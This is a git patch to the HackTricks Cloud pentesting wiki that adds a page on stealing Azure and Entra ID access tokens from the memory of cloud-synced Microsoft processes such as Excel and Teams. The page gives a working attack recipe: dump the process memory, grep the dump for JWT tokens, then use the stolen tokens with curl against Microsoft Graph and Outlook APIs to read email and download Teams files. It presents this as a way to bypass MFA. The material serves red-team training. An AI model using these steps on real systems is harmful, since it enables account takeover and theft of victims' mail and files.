From e15f924219ec8b6001c9605a2c44df0644ed9ac6 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Sat, 20 Jul 2024 16:35:26 +0000
Subject: [PATCH] GITBOOK-647: No subject

---
 SUMMARY.md                                    |  1 +
 .../README.md                                 |  2 +-
 .../az-processes-memory-access-token.md       | 65 +++++++++++++++++++
 3 files changed, 67 insertions(+), 1 deletion(-)
 create mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md

diff --git a/SUMMARY.md b/SUMMARY.md
index 6ac8b7f850..e1798f8cfc 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -409,6 +409,7 @@
     * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
     * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md)
     * [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md)
+    * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md)
     * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
   * [Az - Persistence](pentesting-cloud/azure-security/az-persistence.md)
   * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
index 98d6bc7c3c..b141b1583d 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
@@ -57,7 +57,7 @@ The most interesting type of token is the Primary Refresh Token (PRT).
 From the **compromised machine to the cloud**:
 
 * [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login
-* **Dump processes access tokens**: As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might store access tokens in clear-text in memory. So just dumping the memory of the process and grepping for JWT tokens might grant you access over several resources of the victim in the cloud bypassing MFA.
+* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text.
 * [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it
 * [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it.
 * [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
new file mode 100644
index 0000000000..c8373f6e14
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -0,0 +1,65 @@
+# Az - Processes Memory Access Token
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **Basic Information**
+
+As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
+
+Steps:
+
+1. Dump the excel processes syncronized with in EntraID user with your favourite tool.
+2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
+3. Find the tokens that interest you the most and run tools over them:
+
+{% code overflow="wrap" %}
+```bash
+# Check the identity of the token
+curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq   
+ 
+# Check the email (you need a token authorized in login.microsoftonline.com)
+curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq   
+
+# Download a file from Teams
+## You need a token that can access graph.microsoft.com
+## Then, find the <site_id> inside the memory and call
+curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq     
+ 
+## Then, list one drive
+curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq 
+ 
+## Finally, download a file from that drive:
+┌──(magichk㉿black-pearl)-[~] 
+└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
+```
+{% endcode %}
+
+**Note that these kind of access tokens can be also found inside other processes.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}